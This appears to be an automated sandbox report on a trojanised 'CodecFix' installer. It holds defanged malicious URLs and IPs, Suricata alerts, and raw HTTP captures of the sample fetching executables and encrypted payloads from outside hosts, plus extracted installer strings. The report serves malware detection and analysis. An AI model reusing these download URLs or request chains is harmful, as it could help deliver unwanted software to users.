hxxp://up2.dfiledownload28.space/h_redir.php?offer_id=4&aff_id=1082&source=814&aff_sub=PIAP2&aff_sub2=0&aff_sub3=0&aff_sub4=0&aff_sub5=1202567405&url=http://up2.dfiledownload28.space/offer.php?affId={aff_id}&trackingId=35572117&instId=814&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 54.88.21.193
hxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1082&source=814&aff_sub=PIAP2&aff_sub2=0&aff_sub3=0&aff_sub4=0&aff_sub5=1202567405&url=http://up2.dfiledownload28.space/offer.php?affId={aff_id}&trackingId=35572117&instId=814&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 54.76.4.236
hxxp://up2.dfiledownload28.space/offer.php?affId=1082&trackingId=35572117&instId=814&ho_trackingid=102b93fbc4847dead74b4d0e4663e0&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 54.88.21.193
hxxp://up2.dfiledownload28.space/installer.php?affId=1082&instId=814&ho_trackingid=102b93fbc4847dead74b4d0e4663e0&trackingId=35572117&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 54.88.21.193
hxxp://up.afiledownload27.space/installer.php?affId=1082&instId=814&ho_trackingid=102b93fbc4847dead74b4d0e4663e0&trackingId=35572117&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 52.85.173.195
hxxp://up2.dfiledownload28.space/installer.php?affId=1082&instId=814&ho_trackingid=102b93fbc4847dead74b4d0e4663e0&trackingId=35572117&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1&cid=707569c4c57c87d53171d83f71777ffd&uac=1&id[]=1360&id[]=1361&id[]=1362&id[]=1363&id[]=631&id[]=632&id[]=1454&id[]=1455&id[]=1878&id[]=1879&id[]=1671&id[]=1672&id[]=1673&id[]=1674&id[]=1675&id[]=1676&id[]=1677&id[]=1678&id[]=1679&id[]=1680&id[]=1681&id[]=1682&id[]=1683&id[]=1684&id[]=1685&id[]=1686&id[]=1358&id[]=1359&id[]=1364&id[]=1365 54.88.21.193
hxxp://up.afiledownload27.spacehxxp://up.afiledownload27.space/installer.php?affId=1082&instId=814&ho_trackingid=102b93fbc4847dead74b4d0e4663e0&trackingId=35572117&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 52.85.173.195
hxxp://up2.dfiledownload28.spacehxxp://up2.dfiledownload28.space/h_redir.php?offer_id=4&aff_id=1082&source=814&aff_sub=PIAP2&aff_sub2=0&aff_sub3=0&aff_sub4=0&aff_sub5=1202567405&url=http://up2.dfiledownload28.space/offer.php?affId={aff_id}&trackingId=35572117&instId=814&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 54.88.21.193
hxxp://up2.dfiledownload28.spacehxxp://up2.dfiledownload28.space/offer.php?affId=1082&trackingId=35572117&instId=814&ho_trackingid=102b93fbc4847dead74b4d0e4663e0&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 54.88.21.193
hxxp://up2.dfiledownload28.spacehxxp://up2.dfiledownload28.space/installer.php?affId=1082&instId=814&ho_trackingid=102b93fbc4847dead74b4d0e4663e0&trackingId=35572117&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1&cid=707569c4c57c87d53171d83f71777ffd&uac=1&id[]=1360&id[]=1361&id[]=1362&id[]=1363&id[]=631&id[]=632&id[]=1454&id[]=1455&id[]=1878&id[]=1879&id[]=1671&id[]=1672&id[]=1673&id[]=1674&id[]=1675&id[]=1676&id[]=1677&id[]=1678&id[]=1679&id[]=1680&id[]=1681&id[]=1682&id[]=1683&id[]=1684&id[]=1685&id[]=1686&id[]=1358&id[]=1359&id[]=1364&id[]=1365 54.88.21.193
hxxp://up2.dfiledownload28.spacehxxp://up2.dfiledownload28.space/installer.php?affId=1082&instId=814&ho_trackingid=102b93fbc4847dead74b4d0e4663e0&trackingId=35572117&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 54.88.21.193
hxxp://capital.go2cloud.orghxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1082&source=814&aff_sub=PIAP2&aff_sub2=0&aff_sub3=0&aff_sub4=0&aff_sub5=1202567405&url=http://up2.dfiledownload28.space/offer.php?affId={aff_id}&trackingId=35572117&instId=814&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 54.76.4.236


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /dl/8oGAY/CodecFix A.exe HTTP/1.1
Accept: */*
User-Agent: Setup Factory 8.0
Host: a7.alfafile.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Apr 2016 01:15:53 GMT
Content-Type: application/octet-stream
Content-Length: 8182398
Last-Modified: Thu, 21 Apr 2016 00:18:14 GMT
Connection: keep-alive
Content-Disposition: attachment; filename="CodecFix A.exe"
ETag: "57181c46-7cda7e"
Strict-Transport-Security: max-age=604800
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........2...\...\.
..\..'....\..'....\.......\...]...\..'....\..'....\..'....\.Rich..\...
......PE..L...,-.T.................X...........).......p....@.........
.................P......J6....@.................................<..
.d........n...................0.......................................
...@............p..x............................text....W.......X.....
............. ..`.rdata.......p...0...\..............@[email protected]....
[email protected]..................@[email protected]
[email protected].................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U...X......... [email protected].
SVW.}[email protected]@.P..hq@........`........V......SP.......Pp@..
..W..;.}[email protected][email protected]...
@..4.......P...p@......./ub......<Tt"<Wt.<tt.<wuL......P..
...u>.......6......P.....~(......:u....~....P......P......P........
[email protected]@[email protected];[email protected].
[email protected]@........u....M._..^3.[.........V..W3.h..
[email protected].....<[email protected]
<<< skipped >>>


GET /raw/NgVcEX79 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Setup Factory 8.0
Host: pastebin.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 21 Apr 2016 01:15:52 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=de8fb70691355d9fe520cc2b8e1dc86eb1461201352; expires=Fri, 21-Apr-17 01:15:52 GMT; path=/; domain=.pastebin.com; HttpOnly
X-Powered-By: PHP/5.5.5
Cache-Control: public, max-age=1801
Vary: Accept-Encoding
CF-Cache-Status: MISS
Expires: Thu, 21 Apr 2016 01:45:53 GMT
Server: cloudflare-nginx
CF-RAY: 296cfcc4a80e16be-ARN
2c..1ilzxoa5UW4pSE9/XRZg KkD2Ytbuth4DmZa8Yio1uk=..0..HTTP/1.1 200 OK..
Date: Thu, 21 Apr 2016 01:15:52 GMT..Content-Type: text/plain; charset
=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..Set-Cookie
: __cfduid=de8fb70691355d9fe520cc2b8e1dc86eb1461201352; expires=Fri, 2
1-Apr-17 01:15:52 GMT; path=/; domain=.pastebin.com; HttpOnly..X-Power
ed-By: PHP/5.5.5..Cache-Control: public, max-age=1801..Vary: Accept-En
coding..CF-Cache-Status: MISS..Expires: Thu, 21 Apr 2016 01:45:53 GMT.
.Server: cloudflare-nginx..CF-RAY: 296cfcc4a80e16be-ARN..2c..1ilzxoa5U
W4pSE9/XRZg KkD2Ytbuth4DmZa8Yio1uk=..0..



GET hXXp://up2.dfiledownload28.space/offer.php?affId=1082&trackingId=35572117&instId=814&ho_trackingid=102b93fbc4847dead74b4d0e4663e0&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: up2.dfiledownload28.space
Connection: close
Accept: */*
User-Agent: InstallCapital


HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Thu, 21 Apr 2016 01:15:51 GMT
Connection: close
Content-Length: 76840
..I...../......|..n......j......G.v7..N...s..-i.g.([p.[....A.../c!a.$y
5Ff....sS}u.^U.../Q2.[..][email protected]#v'*Z.....5.,.b......a....#.$.*.N
..YG.....&f..Pi.....-.Y..!~`."./.....2..su.J7:.$...B..wh...z...G.....^
...\.....O.......^..x..).L.7Z...:q.z.$......D;4..q......B~.s]Z.u..x.&l
t;...xR.[..3..pI.V.....O4...OC.s..\..T..<.Q. ld..rr,...=..!.>Kx.
..`.....G.....v.g0t.....->....|En(8..p s.c.......whY_....A.K...-.}.
f..v.(y.#.P.M8..,....".>....`.....B....N..{g.D0.h..a.....L{.-Y9.q.H
.L..A.M^.:K....|r*...t..Er..w.U.fa.F...O.K..j.....&T.t)..,...E.3..K...
.KOo......!...f..q....;....0V.w]..R.....F(..=d..}k.....$..W@._.s.%.]Z.
./l..?;P?......9....d.(..t...N...R'`...W...u1..............6..f].,..9.
N........2.u...?A.`<[email protected]..%._)
.....o....W._ /\T..%w.......8...9oh.....CG.z..e...:D..p.&E.....!.B..`m
..~.8..>.....DP5_.q.K....6.7.g>'.-.y#.w..=.9....~h.9U...p...yDM.
d.X....md..6...y..<.............D...}.......]h.58...q.. ....o.*....
..P;L.....6......2YF....\.[...0..7O...'...E..=...........Oz{..H.'.TG.y
.l...}....i.|...O..y.@.......,.yp.....d....I.4.B..3.O.._X.mGx..3=..!..
.k.Z...6B..]...ZmL....M...b~......ae..{[email protected]...
.7...eI~..&e..tR.u.u.f...]^j.{...E..F..RH.#>.oh.b.......! .u...X._g
4h.._.k.......%..._Y.Uv0e.]....`.....6ZY....]..b.;....9{2.....y......#
.A.._...........6.}b.^xz>..fn.S.y........jc.....l).....F*.u.1&2...-
.V..K.]K..jy.Sm?.g............ .2....o ...........Pw.q.i..ri .2.g...g.
.V..Pj.2*./64.`6.2..A..[H.....<.........bv.qg`..BK.....NG..;.u.
<<< skipped >>>


GET hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1082&source=814&aff_sub=PIAP2&aff_sub2=0&aff_sub3=0&aff_sub4=0&aff_sub5=1202567405&url=http://up2.dfiledownload28.space/offer.php?affId={aff_id}&trackingId=35572117&instId=814&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: capital.go2cloud.org
Connection: close
Accept: */*
User-Agent: InstallCapital


HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 21 Apr 2016 01:16:03 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: hXXp://up2.dfiledownload28.space/offer.php?affId=1082&trackingId=35572117&instId=814&ho_trackingid=102b93fbc4847dead74b4d0e4663e0&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1
P3P: CP="NOI CUR OUR NOR INT"
Pragma: no-cache
Server: nginx/1.7.9
Set-Cookie: enc_aff_session_4=ENC02544-102b93fbc4847dead74b4d0e4663e0-1082-4-0-0-0-0-UA-0-383134-5049415032-30-30-30-31323032353637343035-194.242.96.218-20160420211603-_-2E3C67183E15163661362051461909457C5E4C7B09581D605A5047076C777D6218133009727A794E51; expires=Sat, 21 May 2016 01:16:03 GMT; path=/;
Set-Cookie: ho_mob=eyJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiSW5zdGFsbENhcGl0YWwiLCJjb25uZWN0aW9uX3NwZWVkIjoiYnJvYWRiYW5kIn0=; expires=Sat, 16 Mar 2019 11:56:03 GMT; path=/;
tracking_id: 102b93fbc4847dead74b4d0e4663e0
X-Robots-Tag: noindex, nofollow
Content-Length: 440
Connection: Close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a 
href="hXXp://up2.dfiledownload28.space/offer.php?affId=1082&tracki
ngId=35572117&instId=814&ho_trackingid=102b93fbc4847dead74b4d0
e4663e0&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=&ua
c=1&cid=707569c4c57c87d53171d83f71777ffd&v=1">here</a>
;.</p>.</body></html>...
<<< skipped >>>


POST hXXp://up.afiledownload27.space/installer.php?affId=1082&instId=814&ho_trackingid=102b93fbc4847dead74b4d0e4663e0&trackingId=35572117&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: up.afiledownload27.space
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded

cid=707569c4c57c87d53171d83f71777ffd&uac=1&id[]=1360&id[]=1361&id[]=1362&id[]=1363&id[]=631&id[]=632&id[]=1454&id[]=1455&id[]=1878&id[]=1879&id[]=1671&id[]=1672&id[]=1673&id[]=1674&id[]=1675&id[]=1676&id[]=1677&id[]=1678&id[]=1679&id[]=1680&id[]=1681&id[]=1682&id[]=1683&id[]=1684&id[]=1685&id[]=1686&id[]=1358&id[]=1359&id[]=1364&id[]=1365
HTTP/1.1 403 Forbidden
Server: CloudFront
Date: Thu, 21 Apr 2016 01:16:05 GMT
Content-Type: text/html
Content-Length: 689
Connection: close
X-Cache: Error from cloudfront
Via: 1.1 0991a4b934302d120a32dada6513dc35.cloudfront.net (CloudFront)
X-Amz-Cf-Id: rrfR8jt3yP_bd6XLMxeou5M4AZYqycfZSE13ltvUZB3uikBNk2HT5g==
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "htt
p://VVV.w3.org/TR/html4/loose.dtd">.<HTML><HEAD><MET
A HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
;.<TITLE>ERROR: The request could not be satisfied</TITLE>
.</HEAD><BODY>.<H1>ERROR</H1>.<H2>The re
quest could not be satisfied.</H2>.<HR noshade size="1px">
.This distribution is not configured to allow the HTTP request method 
that was used for this request. The distribution supports only cachabl
e requests..<BR clear="all">.<HR noshade size="1px">.<P
RE>.Generated by cloudfront (CloudFront).Request ID: rrfR8jt3yP_bd6
XLMxeou5M4AZYqycfZSE13ltvUZB3uikBNk2HT5g==.</PRE>.<ADDRESS>
;.</ADDRESS>.</BODY></HTML>..



GET hXXp://up2.dfiledownload28.space/h_redir.php?offer_id=4&aff_id=1082&source=814&aff_sub=PIAP2&aff_sub2=0&aff_sub3=0&aff_sub4=0&aff_sub5=1202567405&url=http://up2.dfiledownload28.space/offer.php?affId={aff_id}&trackingId=35572117&instId=814&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: up2.dfiledownload28.space
Connection: close
Accept: */*
User-Agent: InstallCapital


HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Location: hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1082&source=814&aff_sub=PIAP2&aff_sub2=0&aff_sub3=0&aff_sub4=0&aff_sub5=1202567405&url=http://up2.dfiledownload28.space/offer.php?affId={aff_id}&trackingId=35572117&instId=814&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Thu, 21 Apr 2016 01:15:49 GMT
Connection: close
Content-Length: 592
<head><title>Document Moved</title></head>.<
;body><h1>Object Moved</h1>This document may be found &
lt;a HREF="hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=108
2&source=814&aff_sub=PIAP2&aff_sub2=0&aff_sub3=0&a
ff_sub4=0&aff_sub5=1202567405&url=http://up2.dfiledownlo
ad28.space/offer.php?affId={aff_id}&trackingId=35572
117&instId=814&ho_trackingid={transaction_id}&cc%3
D{country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db%3
D&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1">here&
lt;/a></body>..



POST hXXp://up2.dfiledownload28.space/installer.php?affId=1082&instId=814&ho_trackingid=102b93fbc4847dead74b4d0e4663e0&trackingId=35572117&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: up2.dfiledownload28.space
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded

cid=707569c4c57c87d53171d83f71777ffd&uac=1&id[]=1360&id[]=1361&id[]=1362&id[]=1363&id[]=631&id[]=632&id[]=1454&id[]=1455&id[]=1878&id[]=1879&id[]=1671&id[]=1672&id[]=1673&id[]=1674&id[]=1675&id[]=1676&id[]=1677&id[]=1678&id[]=1679&id[]=1680&id[]=1681&id[]=1682&id[]=1683&id[]=1684&id[]=1685&id[]=1686&id[]=1358&id[]=1359&id[]=1364&id[]=1365
HTTP/1.1 411 Length Required
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Thu, 21 Apr 2016 01:15:52 GMT
Connection: close
Content-Length: 344
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""hXXp://VVV.w3.org
/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>Length
 Required</TITLE>..<META HTTP-EQUIV="Content-Type" Content="t
ext/html; charset=us-ascii"></HEAD>..<BODY><h2>Le
ngth Required</h2>..<hr><p>HTTP Error 411. The reque
st must be chunked or have a content length.</p>..</BODY>&
lt;/HTML>....



GET hXXp://up2.dfiledownload28.space/installer.php?affId=1082&instId=814&ho_trackingid=102b93fbc4847dead74b4d0e4663e0&trackingId=35572117&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1&cid=707569c4c57c87d53171d83f71777ffd&uac=1&id[]=1360&id[]=1361&id[]=1362&id[]=1363&id[]=631&id[]=632&id[]=1454&id[]=1455&id[]=1878&id[]=1879&id[]=1671&id[]=1672&id[]=1673&id[]=1674&id[]=1675&id[]=1676&id[]=1677&id[]=1678&id[]=1679&id[]=1680&id[]=1681&id[]=1682&id[]=1683&id[]=1684&id[]=1685&id[]=1686&id[]=1358&id[]=1359&id[]=1364&id[]=1365 HTTP/1.1
Host: up2.dfiledownload28.space
Connection: close
Accept: */*
User-Agent: InstallCapital


HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Thu, 21 Apr 2016 01:15:53 GMT
Connection: close
Content-Length: 493096
.J..H.ew[.f.Q.'."...Hc.I...%...dv[....Qh..q....(.B.....S.........V.L..
<....F",.?^c4].....6<.K.&... a.)..... c.I 6..v./.....Q.....H.~..
.'...Z.T.....P...t.`..6.[=.q..1.?.r5......N...k.J...hm..'.RK....z./...
.q.H.#...y....!..."Q.........Q.d.P.%M|.2...o..7>./......f..!.. ...}
F...j.}...Q.a...q.....P..V.k. hv.....Gr..YY........j.....RO..l...]..E_
u..Y...c:b-_.......@."xA.....H..!.f....n..hF... k..v.)n..s..a`k..3?6.t
.......IO....w...........8.l?%.8..N.1.n;......M..g....U3..x....4<..
2........fVE(.[vG..4.wi...T...m2.4...x].iBZiw..}.%T...6..W .cOU8l.._IL
.q.i...<.:.$..J...-....l...jh....w....*.i....6....3.0C...^..C.K#V.a
.L.......v.D...M9......Z2.H..... .w..E.K...8......V.C.0..,...X`Yq.L...
......l.._.F:_...~......q.........u..uv8...'...V.7C..n.s5?...{...jW..K
%... .^..}."...&-.l....D..g.-.7..B..Cwf.E...Q...ll.fJ.tj..&d.F.&. b..4
.Go.4.Ud...I......WnS...<}....tt.D.}.xQ..a.M...d...j,9.Nz!....d...n
_f..'l S.1..$.b...CyV..g..#|..%[email protected].|/.....N.....y\mq..yC.\IpO.,
.{.~.. F...... ./Dm. ......55.cG...%I.9_.....L._8,. ...6.a.A....s..B..
.0...$"....Bx..iH~...Z1Z}..0.......:.v........S...d.2...".06....S./...
'a......3r..,....H.;1...[..'.;..#c........:.%..q..f.....gv........g-.y
_f..t........A..p&,...Y..U..g.>.....7.............7!........#'...w.
..*.&.FM...pX.V....RmT.Bq...p...]......ue.~...2....!.\n..w......u.....
...Ys....6ua.v..=...."J.s....w.....](6.O..wZa..)L.Z.\.~.....8.<6.my
.[..../.{.W>#..o.~..T..h.`q.,.y!j.......,.e.Wq.....;.`.....O.....N.
..]b.......w..(....b....6..r8.U.*;[email protected].%. ... ..iiJ....00&l
<<< skipped >>>


GET /file/NFUG HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Setup Factory 8.0
Host: alfafile.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Thu, 21 Apr 2016 01:15:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: hXXp://a7.alfafile.net/dl/8oGAY/CodecFix A.exe
Set-Cookie: pref=LQbK7DKMTF2CYklmnxBC7SJVdqs2mv8SHWl4FIiIkRA=|271384043471a7f661e7ce4647a07d7f; expires=Thu, 21-Apr-2016 02:15:52 GMT; Max-Age=3600; path=/payment
Set-Cookie: lang=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/file/NFUG
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
0..HTTP/1.1 302 Moved Temporarily..Server: nginx..Date: Thu, 21 Apr 20
16 01:15:52 GMT..Content-Type: text/html; charset=UTF-8..Transfer-Enco
ding: chunked..Connection: keep-alive..Location: hXXp://a7.alfafile.ne
t/dl/8oGAY/CodecFix A.exe..Set-Cookie: pref=LQbK7DKMTF2CYklmnxBC7SJVdq
s2mv8SHWl4FIiIkRA=|271384043471a7f661e7ce4647a07d7f; expires=Thu, 
21-Apr-2016 02:15:52 GMT; Max-Age=3600; path=/payment..Set-Cookie: lan
g=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/..S
et-Cookie: ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age
=0; path=/file/NFUG..Expires: Thu, 01 Jan 1970 00:00:01 GMT..Cache-Con
trol: no-cache..X-Frame-Options: SAMEORIGIN..0..

The Trojan connects to the servers at the folowing location(s):

irsetup.exe_484:

`.rsrc
t%SSSS
9=@%u
SSSSh
t%SWV
u)SSh
u)SShd
TSShX
@ SSh
u%SSSV
SSShT
SSSh`
9^$u&SSSSh?
9^$u SSSSh?
9^$u)SSSSh?
|SShF
t2SSh
Ht.Ht S
FLSSh
NLhD%u
GLSSh
GXSSh
FpSSh
FtSSh
G`SSh
.WWWW
Nt.Nt
t'SShl
u$SShe
@ SSHPWj
tFHt:Ht.Ht"Hu`
tWSShW
tl9_ tgSSh
tAHt.HHt
j%XtL9E
<SShG
FtPW
SSh@B
FTCP
u.Ph,
.FG;}
FTPQ
FTPh
V SShW
O SSh
O SSh,
kernel32.dll
%s (%s:%d)
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\afxwin1.inl
MSG_ERROR
%s %d. %s
MSG_ASK_FOR_DISK
MSG_NEW_LOCATION
MSG_CONFIRM_ABORT
MSG_CONFIRM
A%s%s%s.%d
%s.%d
%s, Line %d: %s
File condition evaluation for file "%s"
msi.dll
\msi.dll
Software\Microsoft\Windows\CurrentVersion\Installer
C:\temp\SUF_SFX_TEST\
MSG_INITIALIZING
16670749
_IgnoreInvalidCertificate
SetEntriesInAcl Error %u
SetNamedSecurityInfo Error %u
*.gif
*.tif
*.tga
*.png
*.pcx
*.jpg
*.bmp
[%d]: %s
*** LOCATION: %s
__NOREPORT__
in function <%s:%d>
in function '%s'
Line: %d
%d: [%s]
Script: %s, %s (%s)
__ir_eval_value = %s;
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\afxwin2.inl
%Copyright%. All rights reserved. %CompanyURL%
WindowStyle
MainWindowSettings
%s at offset %d unterminated
Incorrect %s at offset %d
Element '%s' at offset %d not ended
End tag '%s' at offset %d does not match start tag '%s' at offset %d
No start tag for end tag '%s' at offset %d
%s%d bytes
%s%d wide chars to %d bytes
%d bytes to %s%d wide chars
MSG_SEARCH_FILE
(*.*)|*.*||
MSG_SEARCH_ALL
MSG_SEARCH_MASK
MSG_INSERTDISK
MSG_CANCEL
MSG_OK
MSG_BROWSE
MSG_PATH
Windows Server 10
Windows 10
Windows Server 2012 R2
Windows 8.1
Windows Server 2012
Windows 8
Windows Server 2008 R2
Windows 7
Windows Server 2008
Windows Vista
Windows Server 2003
Windows XP
CPasswordData
-- Defined in _SUF70_Global_Functions.lua
number e_ErrorCode, string e_ErrorMsgID
%TempFolder%\%ProductName% Setup Log.txt
%StartupFolder%
%StartFolder%
%StartProgramsFolder%
ÞsktopFolder%
%s\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
%CommonFilesFolder%\Microsoft Shared\DAO
Software\Microsoft\Shared Tools\DAO350.dll
Software\Microsoft\Shared Tools\DAO360.dll
ÚOPath%
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
%SourceFolder%
%SystemDrive%
_WindowsFolder
%WindowsFolder%
%SystemFolder%
%CommonFilesFolder%
%CommonFilesFolder64%
%CommonProgramW6432%
%CommonDocumentsFolder%
%StartupFolderCommon%
%StartProgramsFolderCommon%
%StartFolderCommon%
%FontsFolder%
ÞsktopFolderCommon%
;?;?.lua
UninstallSupportFiles
CPRegKey
Run extra uninstall script: %d
Original: %d
Calculated: %d
Unable to open archive file: %d
lua5.1.dll
%SourceDrive%
%SourceFilename%
\irsetup.dat
{D387204B-8FB9-6A21-15FA-0CD14BF40EA9}
Support file added to uninstall list:
Registry key added to uninstall list:
Removed! %d
IDispatch error #%d
Error 0xx: %s
Register font: %s, %s
%sbk%d
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
Remove uninstall support file:
MSG_NO
MSG_YES_TOALL
MSG_YES
MSG_UNINSTALL_OK_REMOVE
MSG_UNINSTALL_NO_APP_USE
MSG_UNINSTALL_REMOVE_SHARED
Decrement shared file count: %s (New count = %d)
SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs
: %s (#%d)
Global include script: %s
RegisterTypeLib: %s
RegisterTypeLib failure reason: %s
RegisterTypeLib: %s - %s
Register COM file: %s
Register COM failure reason: %s
Register COM file: %s - System Error # %u
Register COM file on reboot: %s
regsvr32.exe /s %s
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Increment usage count: %s
Increment usage count: %s (New count = %d)
%s\%s
%s (%d)
\irsetup.skin
local e_Stage = %d;local e_CurrentItemText=[==[%s]==];local e_CurrentItemPct=%d;local e_StagePct=%d;
MSG_SYSREQ_WARN
MSG_NOTICE
MSG_SYSREQ_ABORT
%s: %s
MSG_SYSREQ_USERPERMISSION
MSG_SYSREQ_SYSTEMADMIN
MSG_SYSREQ_COLORDEPTH
MSG_BITSPERPIXEL
MSG_SYSREQ_SCREENHEIGHT
%s: %d
MSG_SYSREQ_SCREENWIDTH
%s: %d %s
MSG_SYSREQ_RAM
MSG_SIZE_MEGABYTES
Operating System
MSG_SYSREQ_OS
MSG_OS_PART_ORNEWER
MSG_OS_PART_NOSERVPACK
MSG_OS_PART_SERVPACK
MSG_OS_PART_SE
MSG_OS_PART_C
MSG_OS_PART_B
MSG_OS_PART_A
MSG_OS_ALL
MSG_OS_NONE
MSG_OS_WSRV10
MSG_OS_W10
MSG_OS_WSRV2012_R2
MSG_OS_W8_1
MSG_OS_WSRV2012
MSG_OS_W8
MSG_OS_WSRV2008_R2
MSG_OS_W7
MSG_OS_WSRV2008
MSG_OS_WVISTA
MSG_OS_WSRV2003
MSG_OS_WXP
MSG_OS_UNKNOWN
MSG_SYSREQ_NOTMET
%s %d %s
MSG_EXP_USESLEFT
MSG_EXP_USESLEFT2
%s %I64d %s
MSG_EXP_DAYSLEFT
MSG_EXP_DAYSLEFT2
Software\Microsoft\Windows\CurrentVersion\I652R9823\
MSG_EXP_CONTACT_START
Run project event: %s
local e_ErrorCode=%d; local e_ErrorMsgID = "%s"
Start project event: %s
MSG_UNINSTALLFILE_NOREMOVE
MSG_UNINSTALLFILE_INUSE
%s (%s: %u)
\WININIT.INI
MSG_FILE_EXISTS_INUSE
MSG_FILE_EXISTS_RETRY
MSG_FILE_EXISTS_ANY
MSG_FILE_EXISTS_NEWER
MSG_FILE_OVERWRITE_CONFIRM
%s\%s.lnk
%s (Return code: %d)
Product: %s, version %s
MSG_SEEKING
%s (%d):
Arc: %s
FN: %s
%s (#%d)
MSG_SKIPPING
MSG_INSTALLING
MSG_PROG_UNINSTALL_CREATECONTROLFILE
ERR_CREATEUNINSTALL_OPEN_EXE_READ
ERR_CREATEUNINSTALL_OPEN_EXE_WRITE
Overwrite uninstall executable:
